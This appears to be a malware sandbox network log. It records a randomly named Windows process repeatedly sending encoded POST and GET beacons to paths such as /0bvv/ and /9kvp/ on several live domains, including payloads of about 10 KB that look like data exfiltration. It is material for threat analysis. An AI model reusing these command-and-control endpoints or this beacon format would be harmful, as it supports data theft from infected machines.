                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.nieuws-july202541.sbs
                                                                                Origin: http://www.nieuws-july202541.sbs
                                                                                Referer: http://www.nieuws-july202541.sbs/0bvv/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 200
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Ascii: Y8i=GuxFc+sXLybX8tmVdpn/6pIosgDXY/Uzvy9exOHrYCnOgpKLaa3FJg9oh0CqHb3pRQordta8/0v50jXAd6OhJKWLl5jajhnLEUaTvualOpoZdHTKXv8FmPGvbghqbtThHzQ5FrOIQgAX3PZQba8i+vj3TrVpiWtP/3dWFJmPIwH3VE73HDzfxkOMhsKU8Jv34w==
                                                                                Nov 17, 2024 08:36:45.687773943 CET  1236  IN  HTTP/1.1 404 Not Found
                                                                                keep-alive: timeout=5, max=100
                                                                                content-type: text/html
                                                                                transfer-encoding: chunked
                                                                                content-encoding: gzip
                                                                                vary: Accept-Encoding
                                                                                date: Sun, 17 Nov 2024 07:36:45 GMT
                                                                                server: LiteSpeed
                                                                                x-turbo-charged-by: LiteSpeed
                                                                                connection: close
                                                                                Data: (gzip-compressed, chunked response body; binary dump omitted)
                                                                                Nov 17, 2024 08:36:45.687886000 CET  1236  IN  (continuation of compressed body; binary dump omitted)
                                                                                Nov 17, 2024 08:36:45.687921047 CET  1236  IN  (continuation of compressed body; binary dump omitted)
                                                                                Nov 17, 2024 08:36:45.687953949 CET  1236  IN  (continuation of compressed body; binary dump omitted)
                                                                                Nov 17, 2024 08:36:45.687988043 CET  294   IN  (continuation of compressed body; binary dump omitted)


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                10          192.168.2.4  50001        162.0.215.33    80                3604  C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp                            Bytes transferred  Direction  Data
                                                                                Nov 17, 2024 08:36:47.550487041 CET  807                OUT        POST /0bvv/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.nieuws-july202541.sbs
                                                                                Origin: http://www.nieuws-july202541.sbs
                                                                                Referer: http://www.nieuws-july202541.sbs/0bvv/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 220
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Ascii: Y8i=GuxFc+sXLybX8M2VSqP/4JIvgADXK/U3vzBexPC2NgzOhMOLdb3FAw9ozUCvZr2ERQsjdsm8/0750jHAdpmuIaWztZjUsBnLEUaTvq2DOtEZc0LKXNUC4/GsRAhqKdSJHzQHFp6iQi4X3LdQbOglp/j9XrUqy0QGnG8JPoDoHTv1UCqtWySIjkq/8rDgxKS+j4KY2f0QnN6H9Qals+5+SNg=
                                                                                Nov 17, 2024 08:36:48.233987093 CET  1236  IN  HTTP/1.1 404 Not Found
                                                                                keep-alive: timeout=5, max=100
                                                                                content-type: text/html
                                                                                transfer-encoding: chunked
                                                                                content-encoding: gzip
                                                                                vary: Accept-Encoding
                                                                                date: Sun, 17 Nov 2024 07:36:48 GMT
                                                                                server: LiteSpeed
                                                                                x-turbo-charged-by: LiteSpeed
                                                                                connection: close
                                                                                Data: (gzip-compressed, chunked response body; binary dump omitted)
                                                                                Nov 17, 2024 08:36:48.234033108 CET  1236  IN  (continuation of compressed body; binary dump omitted)
                                                                                Nov 17, 2024 08:36:48.234069109 CET  424   IN  (continuation of compressed body; binary dump omitted)
                                                                                Nov 17, 2024 08:36:48.234102964 CET  1236  IN  (continuation of compressed body; binary dump omitted)
                                                                                Nov 17, 2024 08:36:48.234141111 CET  1106  IN  (continuation of compressed body; binary dump omitted)


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                11          192.168.2.4  50017        162.0.215.33    80                3604  C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp                            Bytes transferred  Direction  Data
                                                                                Nov 17, 2024 08:36:50.142884970 CET  3708               OUT        POST /0bvv/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.nieuws-july202541.sbs
                                                                                Origin: http://www.nieuws-july202541.sbs
                                                                                Referer: http://www.nieuws-july202541.sbs/0bvv/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 10300
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Nov 17, 2024 08:36:50.142910004 CET  7181  OUT  (continuation of POST body)
                                                                                Data Ascii: KlZWlqmK7g1orjf2jJ4tCgeqqdJJ6VHfZtqAN6aBHJNSgGdxal6ErCGJhL6iEz0hUBVNPAMd6B3tKIoQfziuKo7qo6N0m0SD1UZP0iKO+VAniBkY9Al3W0PaVg6snkuFs04YNgSfFWnAkj0fWCsIIczI288sXKHOEtThI923n1OT7FrOPovWBRM8BkigIWzrp3n0uIoR/D2fxYmhhWZKMlEpkElgXzOBRByUYypXOaqNXSUHa+N
                                                                                Nov 17, 2024 08:36:50.826848030 CET  1236  IN  HTTP/1.1 404 Not Found
                                                                                keep-alive: timeout=5, max=100
                                                                                content-type: text/html
                                                                                transfer-encoding: chunked
                                                                                content-encoding: gzip
                                                                                vary: Accept-Encoding
                                                                                date: Sun, 17 Nov 2024 07:36:50 GMT
                                                                                server: LiteSpeed
                                                                                x-turbo-charged-by: LiteSpeed
                                                                                connection: close
                                                                                Data: (gzip-compressed, chunked response body; binary dump omitted)
                                                                                Nov 17, 2024 08:36:50.826879978 CET  1236  IN  (continuation of compressed body; binary dump omitted)
                                                                                Nov 17, 2024 08:36:50.826895952 CET  1236  IN  (continuation of compressed body; binary dump omitted)
                                                                                Nov 17, 2024 08:36:50.826911926 CET  636   IN  (continuation of compressed body; binary dump omitted)
                                                                                Nov 17, 2024 08:36:50.826927900 CET  894   IN  (continuation of compressed body; binary dump omitted)


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                12          192.168.2.4  50020        162.0.215.33    80                3604  C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp                            Bytes transferred  Direction  Data
                                                                                Nov 17, 2024 08:36:52.689620972 CET  510                OUT        GET /0bvv/?gvyXe=EtxTw6OpYVppMB&Y8i=LsZlfLJLVWn36+29SrbHwZ4luzPZC8QC5ghK6sSKdTzC3J+tSarGA1FPkRmoEIfFSAMLZ+GzwFna9SDLC9K8A7K2msKq/CeIb1Pmlq+zJ/M9UWL1f9QpmJ4= HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.nieuws-july202541.sbs
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Nov 17, 2024 08:36:53.370141983 CET  1236  IN  HTTP/1.1 404 Not Found
                                                                                keep-alive: timeout=5, max=100
                                                                                content-type: text/html
                                                                                transfer-encoding: chunked
                                                                                date: Sun, 17 Nov 2024 07:36:53 GMT
                                                                                server: LiteSpeed
                                                                                x-turbo-charged-by: LiteSpeed
                                                                                connection: close
                                                                                Data Ascii: 278D<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
                                                                                Nov 17, 2024 08:36:53.370170116 CET1236INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63
                                                                                Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-rep
                                                                                Nov 17, 2024 08:36:53.370187044 CET424INData Raw: 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                Data Ascii: -image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address {
                                                                                Nov 17, 2024 08:36:53.370203018 CET1236INData Raw: 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 61 20 69 6d 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 70 79 72 69 67 68 74 20 7b 0a 20 20 20 20 20 20
                                                                                Data Ascii: footer a img { border: 0; } .copyright { font-size: 10px; color: #3F4143; } @media (min-width: 768px) { .additional-info { position: relativ
                                                                                Nov 17, 2024 08:36:53.370219946 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a
                                                                                Data Ascii: display: inline; } } @media (min-width: 992px) { .additional-info { background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAPAAAADqCAMAAACrxjhdAAAAt1BMVEUAAAAA
                                                                                Timestamp: Nov 17, 2024 08:36:53.370553017 CET | Bytes transferred: 1236 | Direction: IN | Data Ascii: WkAb81kz8fEo5Na0rAQYU8KQEWEPSkAaafnRPiXEGHPCCbcnxphIEPPnhXc9XkRNuHh3Cw8JXteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAAABJRU5ErkJggg==); } .container { width: 70%; } .status-code {
                                                                                Timestamp: Nov 17, 2024 08:36:53.370579958 CET | Bytes transferred: 927 | Direction: IN | Data Ascii: <img src="/img-sys/server_misconfigured.png" class="info-image" /> <div class="info-heading"> www.nieuws-july202541.sbs/cp_errordocument.shtml (port 80)


                                                                                Session ID: 13 | Source IP: 192.168.2.4 | Source Port: 50021 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3604 | Process: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp: Nov 17, 2024 08:36:58.460618973 CET | Bytes transferred: 763 | Direction: OUT | Data: POST /d22y/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.bandukchi.com
                                                                                Origin: http://www.bandukchi.com
                                                                                Referer: http://www.bandukchi.com/d22y/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 200
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Ascii: Y8i=QzjizwAZyMQS5h3An6VBJ8DDMtAxOSmOkche/HWwA1GSt8DiYQMv9BuizZbuL3+ANZqPOoWqMoDWtG5TYjjAVjuq+NSotW7l7biuA8VEtLpoXyO+IIzdske21sNIB+U47LyPQmzxl1yNH1QC1p0vTzAgyq01VVlJRbwxZYYoC8LTMrGWMYlYQNAJDJ/YQCbnXg==


                                                                                Session ID: 14 | Source IP: 192.168.2.4 | Source Port: 50022 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3604 | Process: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp: Nov 17, 2024 08:37:01.009502888 CET | Bytes transferred: 783 | Direction: OUT | Data: POST /d22y/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.bandukchi.com
                                                                                Origin: http://www.bandukchi.com
                                                                                Referer: http://www.bandukchi.com/d22y/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 220
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Ascii: Y8i=QzjizwAZyMQS7AHA0LVBPcDAJtAxBymKkc9e/GCaDD+StZnibUYv8Buih5bnFX+1NZm9OqSqMoXWtGpTfSjHVzuoxtSQwm7l7biuA8AMtLBoXDe+HJzemEe12sNIXOU87LytQnucl3KNH3YC16ssJjAm2q1WbVkxb5BARLscIobLANXMdpEPCNk6eO2sdBmuMl2trGPOK7sWJrMqEFlDdZs=


                                                                                Session ID: 15 | Source IP: 192.168.2.4 | Source Port: 50023 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3604 | Process: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp: Nov 17, 2024 08:37:03.548578978 CET | Bytes transferred: 10865 | Direction: OUT | Data: POST /d22y/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.bandukchi.com
                                                                                Origin: http://www.bandukchi.com
                                                                                Referer: http://www.bandukchi.com/d22y/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 10300
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Ascii: Y8i= [TRUNCATED]


                                                                                Session ID: 16 | Source IP: 192.168.2.4 | Source Port: 50024 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3604 | Process: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp: Nov 17, 2024 08:37:06.094369888 CET | Bytes transferred: 502 | Direction: OUT | Data: GET /d22y/?Y8i=dxLCwHEd799e6zKzvZNVLcz/EcQwMQKXxfRDzHSBACKu35rXWSMWvF6m2/zFPWSnOOS4JYjJIrjoqVx5R3nGQB+J6unEzU7Qg/zyG7VApaoWeyOXFK3Agjg=&gvyXe=EtxTw6OpYVppMB HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.bandukchi.com
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Timestamp: Nov 17, 2024 08:37:06.717147112 CET | Bytes transferred: 400 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                                Server: openresty
                                                                                Date: Sun, 17 Nov 2024 07:37:06 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 260
                                                                                Connection: close
                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Y8i=dxLCwHEd799e6zKzvZNVLcz/EcQwMQKXxfRDzHSBACKu35rXWSMWvF6m2/zFPWSnOOS4JYjJIrjoqVx5R3nGQB+J6unEzU7Qg/zyG7VApaoWeyOXFK3Agjg=&gvyXe=EtxTw6OpYVppMB"}</script></head></html>


                                                                                Session ID: 17 | Source IP: 192.168.2.4 | Source Port: 50025 | Destination IP: 98.124.224.17 | Destination Port: 80 | PID: 3604 | Process: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp: Nov 17, 2024 08:37:11.980007887 CET | Bytes transferred: 757 | Direction: OUT | Data: POST /9kvp/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.gcast.video
                                                                                Origin: http://www.gcast.video
                                                                                Referer: http://www.gcast.video/9kvp/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 200
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Ascii: Y8i=vptOKRUU/P+/0jRFBvo6pOosqtCgG1aWdT1KBrm5tAB0nFBhAtJ2f1U1xOfCBIGrjA/yuxrLBSNgitp7dpghlMDTPhK+5yxAhU7Hc34nm6cu5VkW5ZrJXv8JNW3kkoril/QeSj8f13xkbxG/64UAS5uIK34acMw22IF1LopbeH0aymDq+c7d/YXQrKZ7YfMyow==
                                                                                Timestamp: Nov 17, 2024 08:37:12.617120028 CET | Bytes transferred: 1236 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                                Content-Type: text/html
                                                                                Server: Microsoft-IIS/10.0
                                                                                X-Powered-By: ASP.NET
                                                                                X-Frame-Options: SAMEORIGIN
                                                                                Date: Sun, 17 Nov 2024 07:37:12 GMT
                                                                                Connection: close
                                                                                Content-Length: 1245
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                Timestamp: Nov 17, 2024 08:37:12.618607044 CET | Bytes transferred: 218 | Direction: IN | Data Ascii: <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                Session ID: 18 | Source IP: 192.168.2.4 | Source Port: 50026 | Destination IP: 98.124.224.17 | Destination Port: 80 | PID: 3604 | Process: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp: Nov 17, 2024 08:37:14.518320084 CET | Bytes transferred: 777 | Direction: OUT | Data: POST /9kvp/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.gcast.video
                                                                                Origin: http://www.gcast.video
                                                                                Referer: http://www.gcast.video/9kvp/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 220
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Ascii: Y8i=vptOKRUU/P+/1AJFSIc6uuor29CgQFaNdSJKBuL8tyl0mnZhBo12Y1U1l+fDcYGijACPuwXLBSZgisZ7IOUim8DrJhK82SxAhU7Hc39Cm6Eu+lUW493IZP8IKW3kz4r+l/Q4Smc510Zkb0i/6t0fY5uCAX5LZNtawIw7Gbx1ZmFnzgSwvtaKtYzj2NQPVcx7z1XHVc5Rk3oLDL0LYc4OtkY=
                                                                                Timestamp: Nov 17, 2024 08:37:15.152802944 CET | Bytes transferred: 1236 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                                Content-Type: text/html
                                                                                Server: Microsoft-IIS/10.0
                                                                                X-Powered-By: ASP.NET
                                                                                X-Frame-Options: SAMEORIGIN
                                                                                Date: Sun, 17 Nov 2024 07:37:14 GMT
                                                                                Connection: close
                                                                                Content-Length: 1245
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                Timestamp: Nov 17, 2024 08:37:15.152828932 CET | Bytes transferred: 218 | Direction: IN | Data Ascii: <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                Session ID: 19 | Source IP: 192.168.2.4 | Source Port: 50027 | Destination IP: 98.124.224.17 | Destination Port: 80 | PID: 3604 | Process: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp: Nov 17, 2024 08:37:17.066808939 CET | Bytes transferred: 10859 | Direction: OUT | Data: POST /9kvp/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.gcast.video
                                                                                Origin: http://www.gcast.video
                                                                                Referer: http://www.gcast.video/9kvp/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 10300
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
Data Ascii: Y8i= [TRUNCATED]
Nov 17, 2024 08:37:17.703530073 CET | 1236 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
X-Frame-Options: SAMEORIGIN
Date: Sun, 17 Nov 2024 07:37:17 GMT
Connection: close
Content-Length: 1245
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Nov 17, 2024 08:37:17.703572989 CET | 218 | IN | Data Raw: 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e
Data Ascii: <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 50028 | 98.124.224.17 | 80 | 3604 | C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
Timestamp | Bytes transferred | Direction | Data
Nov 17, 2024 08:37:19.607604027 CET | 500 | OUT | GET /9kvp/?Y8i=irFuJh4j2fCN/xdLIJkju+0Ww/aOPRv0cSVSUNzcrQBJ8yd3G+0Gay8rhpLSBKnoinj5jjn5ajFjqPJaFJwFxtDWOxi5ujV2lXqfQRwRqrJQ238DxciUY6U=&gvyXe=EtxTw6OpYVppMB HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Host: www.gcast.video
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
Nov 17, 2024 08:37:20.466541052 CET | 1236 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
X-Frame-Options: SAMEORIGIN
Date: Sun, 17 Nov 2024 07:37:19 GMT
Connection: close
Content-Length: 1245
